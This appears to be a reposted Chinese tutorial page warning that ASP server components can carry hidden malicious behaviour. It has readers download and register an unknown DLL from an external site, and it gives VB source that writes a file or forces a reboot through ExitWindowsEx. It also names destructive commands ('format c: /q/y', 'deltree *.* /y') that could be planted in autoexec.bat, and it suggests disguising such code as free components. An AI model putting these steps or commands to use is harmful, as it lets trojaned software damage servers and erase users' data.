当前位置: 首页 > 图文教程 > 网络编程 > ASP > ASP组件中的安全问题

ASP
ASP正则表达式技巧
ASP Access实现网站计数器(访问量)
ASP新闻分页,将一篇过长的文章分页,生成静态页面
一些关于asp 购物车的想法
一个sql查询器,自动画表格填字段
ASP实现文件直接下载的代码
把网页中的(电话,qq等数字)生成图片的ASP程序
asp长文章用分页符来分页显示
Asp函数介紹(37个常用函数)
ASP中的面向对象类
分页实现方法的性能比较
asp ajax跨域提交数据
asp修改文件和文件夹的名字的代码
ASP 多关键词查询实例代码
asp被杀毒软件误删的解决方法
asp 多关键词搜索的简单实现方法
asp 根据IP地址自动判断转向分站的代码
asp dictionary对象的用法
ASP 千万级数据分页的存储过程
ASP隐藏真实文件的下载功能实现代码

ASP组件中的安全问题


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-03   浏览: 127 ::
收藏到网摘: n/a

  Microsoft推出的ASP(Active Server Page)以简单、易用、功能多、可扩充性等强大功能得到了网友和大多数网管的喜爱,大有完全代替CGI的趋势。但是我要对你说,如果使用ASP的话,你网络的安全同时也大大降低了!

  在我继续说下去之前,请你完成以下步骤:
  1.下载这个文件“http://home.gbsource.net/xuankong/dll.zip”,解压缩后把其中的test.dll文件拷贝到“c:\windows\system”(如果你是使用NT的话,请拷贝到相应目录);
  2.接下来打开“开始/运行”菜单输入“regsvr32 test.dll”命令;
  3.拷贝解压缩后的文件包中的那个index.asp到你的服务器目录(如果你是使用PWS‘Personal Web Server’调试可以拷贝到“c:\Inetpub\wwwroot”,NT请拷贝到相应的目录);
  4.换一台机器用IE浏览index.asp文件看一看(你看到的是出错代码,但是实际上程序已经运行了),你再返回你的机器看一看c:\下是否多了一个文件?!一个名为“xuankong.dat”的文件(其实如果我愿意,你的c:\autoexec.bat文件也可以被我打开并写入一些什么“format c: /q/y”或者“deltree *.* /y”的命令,等你下次重新启动机器。嘿嘿……)。
  

  我们一起来看看到底是怎么一回事,你刚才拷贝的那些DLL文件其实是我使用Visul Basic 5.0开发的一个组件:
  1.打开VB5.0新建一个“ActiveX dll”文件,把下面的代码录入进去。
  Private Declare Function ExitWindowsEx Lib ″user32″ _
  (ByVal uFlags As Long, ByVal dwReserved As Long) _
  As Long

  Sub xuankong()′请不要加上″private″  
 a$ = InputBox(″请输入你的姓名,如果你的输入是″xuankong″″ + Chr(13) + Chr(10) + ″则会在你的系统中生成一个″xuankong.dat″文件″ + Chr(10) + Chr(13) + ″否则的话你的机器可能重启″, ″请输入″, ″xuankong″)
  If a$ = ″xuankong″ Then

  Open ″c:\xuankong.dat″ For Append As #1

  Write #1, ″我的朋友,这是一个ASP组件的测试程序″

  Write #1, ″hello world!This is a test″

  Write #1, ″如果你看到这个文件表示测试成功!!!″

  Else

  ExitWindowsEx &H43, 0′使用API函数重新启动机器

  End If

  Close #1 >

  End Sub
  

  2.把工程名改为dll,类模块改为test,然后把这个工程生成DLL文件到c:\windows\system目录下面。
  

  3.新建一个index.asp文件把下面的代码录入进去。
  $#@60;% set rs=server.createobject(″dll.test″)%$#@62;
  $#@60;% set rs1=rs.xuankong    rs1.execute    %$#@62;
  

  4.拷贝index.asp到你的服务器内,按照上面所述进行调试!   好了,如果你调试完成,有什么感觉???如果是使用VC++ 、Visual Java开发(它们开发出来的组件功能可更加强大);如果把上面的VB代码改一下,加入到一些FTP组件、E-mail组件、HTTP组件、聊天室组件、计数器组件中……(凡是可以输入/输出的组件,没法输入/输出的组件的破坏力有一定局限),再给这些组件加上一个好听的名字“免费的……”你不上当吗(嘿嘿!说不定你已经上当了,天下免费的东西可是好东西!!!*^v^*)?
  

  上面所说的是ASP组件的安全问题!另外如果有些作者在写ASP组件时不小心留下系统bug!那就更加不易被人发觉了!